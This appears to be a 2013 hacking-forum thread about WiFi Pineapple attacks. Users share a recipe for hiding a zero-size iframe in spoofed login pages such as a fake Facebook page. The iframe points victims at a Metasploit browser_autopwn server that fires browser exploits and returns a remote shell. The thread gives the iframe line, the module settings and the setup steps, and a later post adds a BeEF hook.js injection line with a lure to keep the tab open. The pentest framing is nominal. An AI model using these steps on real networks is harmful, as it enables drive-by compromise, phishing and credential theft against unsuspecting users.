Pine-Phishing... Why harvest credentials when you can harvest a shell (or both)?!?!

[skysploit]

So, here's a simple change that could pay out big (in a pinch) on a pentest...

How does it work?

It embeds a tiny iframe (about the size of a ".") at the bottom of a spoofed webpage. Once someone browses to the site they're immediately connected to the attacking machine. Dozens of exploits are then sent back to the victim. If the attack is successful, the attacking machine will receive a meterpreter shell.

How to set it up.

1. Add the iframe below to any/all of your spoofed sites. Example, the "facebook.html" file from Darren's "phish-pineapple.zip".
2. Open msfconsole and "use auxiliary/server/browser_autopwn"
3. Set the options below (n00b's, let Google be your guide)
4. Turn on "DNS Spoof" from the main page of the Pineapple.
5. Wait for the victim (subject/client) to browse to the site. Once a connection to the spoofed page has been initiated you will fire a tasty batch of exploits.

Quick note with browser_autopwn (for those that have not used it): It is a very finicky auxiliary module within the msf. It will more than likely fail on a patched system (hence the purpose of pentesting). Not to mention the amount of traffic that is generated by browser_autopwn. It's always best to enumerate, find out what browsers are being used, then perform a targeted attack.

Side note: Pentesting at Starbucks can get you put in jail...

Happy (responsible) hacking!
~skysploit

iframe (add this to the end of the script)

"iframe SRC="http://172.16.42.42:8080/hacked" height = "0" width ="0"/"                                
Note: replace the " " at the beginning and end with < > 

Settings for browser_autopwn

msf  auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name           Current Setting   Required       Description
   ----           ---------------   --------       -----------
   LHOST            172.16.42.42      yes          The IP address to use for reverse-connect payloads
   SRVHOST          172.16.42.42      yes          The local host to listen on. 
   SRVPORT          8080              yes          The local port to listen on.
   SSL              false             no           Negotiate SSL for incoming connections
   SSLCert                            no           Path to a custom SSL certificate 
   SSLVersion       SSL3              no           Specify the version of SSL that should be used
   URIPATH          /hacked           no           The URI to use for this exploit (default is random)

msf  auxiliary(browser_autopwn) > exploit

.......
(Server build process was pulled out)
.......

[*] --- Done, found 53 exploit modules

[Mr-Protocol]

About time someone else though of this ;)

You could theoretically do the same with ettercap.

But instead of autopwn. How about Rel1k's SET java payload? :D

[skysploit]

That's a great idea! I will have to go back and play around with the java payload. :)

[Foxtrot]

That's a great idea! I will have to go back and play around with the java payload. :)

Keep posting man, this is great!

-Foxtrot

[Zephyr]

Side note: Pentesting at Starbucks can get you put in jail...

Not if you're using you Macbook Pro and wearing your rectangular, thick-framed spectacles while donning a latest cause t-shirt ;)

[inTheDMZ]

This methold could also be used the BeEF, placing the hook.js script directly onto a fake webpage on the pineapple and the beEF server can sit on the same network as the pineapple or even on a VPS/Home server for remote beEF hooking.

Create a webpage that suggests the tab needs to be kept open for internet access to remain and most users would be fooled enough to keep it open in the background.

inject this:

<script language='Javascript' src="192.168.1.100/hook.js"></script> 

where 192.168.1.100 is the IP address (local or remote) of the beEF server

Edited February 20, 2013 by inTheDMZ

[Foxtrot]

This methold could also be used the BeEF, placing the hook.js script directly onto a fake webpage on the pineapple and the beEF server can sit on the same network as the pineapple or even on a VPS/Home server for remote beEF hooking.

Create a webpage that suggests the tab needs to be kept open for internet access to remain and most users would be fooled enough to keep it open in the background.

Could work, some sites ask you to keep another window/tab open while a download finishes, etc...

Maybe a module should be created

-Foxtrot

EDIT: Has anyone got part or all of the BeEF to run on the Pineapple? Never looked into it..

Edited February 20, 2013 by Foxtrot

[inTheDMZ]

I've run BeEF on a minimal VPS before, and it was a bit slow, I guess it could work on the Pineapple but it would take up resources, see what you can do!

[Foxtrot]

I've run BeEF on a minimal VPS before, and it was a bit slow, I guess it could work on the Pineapple but it would take up resources, see what you can do!

Aye!; I'll prepare a USB :)

-Foxtrot

[crepsidro]

Wait... Pineapple's firmware includes metasploit framework? Get outta town!

[Foxtrot]

Wait... Pineapple's firmware includes metasploit framework? Get outta town!

uh.. does it?

-Foxtrot

[Mr-Protocol]

uh.. does it?

-Foxtrot

Pretty sure no. To many dependencies and it is a resource hog.

[Foxtrot]

Pretty sure no. To many dependencies and it is a resource hog.

Ah, thought so lol

-Foxtrot

[skysploit]

Wait... Pineapple's firmware includes metasploit framework? Get outta town!

crepsidro, I have not personally tried to run msf on the pineapple. I dont think it has the "juice" to support it. Here's a little more info on preparing for the autopwn attack. There's multiple ways to this, below is the way I typically setup my connections.

1. Connect the Pineapple to your ethernet port and connect your wireless card to a wireless network.
2. Using Backtrack runnning in a VM, connect both the wireless card and the ethernet port to the VM (yes, i pull both resources from the hosting machine to the VM).
3. Run the pineapple setup script and set your ethernet port to the default address (172.16.42.42), set the wifi adapter to the networks gateway address.
4. Open Metasploit using "msfconsole" or "msfcli" (Again use Google as a reference to help set the parameters above)

Hope this helps.

~skysploit

[crepsidro]

Yes, sorry, i figured it out - been stupid. I thought at some point you were talking about standalone metasploit implementation.

If i have my laptop i dont need a pineapple - wifi adapter works as fine.

[skysploit]

Yes, sorry, i figured it out - been stupid. I thought at some point you were talking about standalone metasploit implementation.

If i have my laptop i dont need a pineapple - wifi adapter works as fine.

Well who's to say that you can't setup a remote listener and have the iframe pointed to that location. Or possibly have the laptop within wireless range of the pineapple.

[Mr-Protocol]

Well who's to say that you can't setup a remote listener and have the iframe pointed to that location. Or possibly have the laptop within wireless range of the pineapple.

The first half of this was an idea I had a year or so ago :P It's a good one too.

[barry99705]

Pretty sure no. To many dependencies and it is a resource hog.

Heh, should try running metasploit on a pda! I've done it, once. It was painful, but it worked.

Not my device, but that's what I had.

​ <<----- Why is this getting added after every image?

Edited February 26, 2013 by barry99705

[Mr-Protocol]

That had to be painful and have a good deal of storage. It looks like the same characters used for yahoo to parse their packets. How are you attaching the image?

[barry99705]

That had to be painful and have a good deal of storage. It looks like the same characters used for yahoo to parse their packets. How are you attaching the image?

The image icon above the post box. It also added one when I added an emoticon.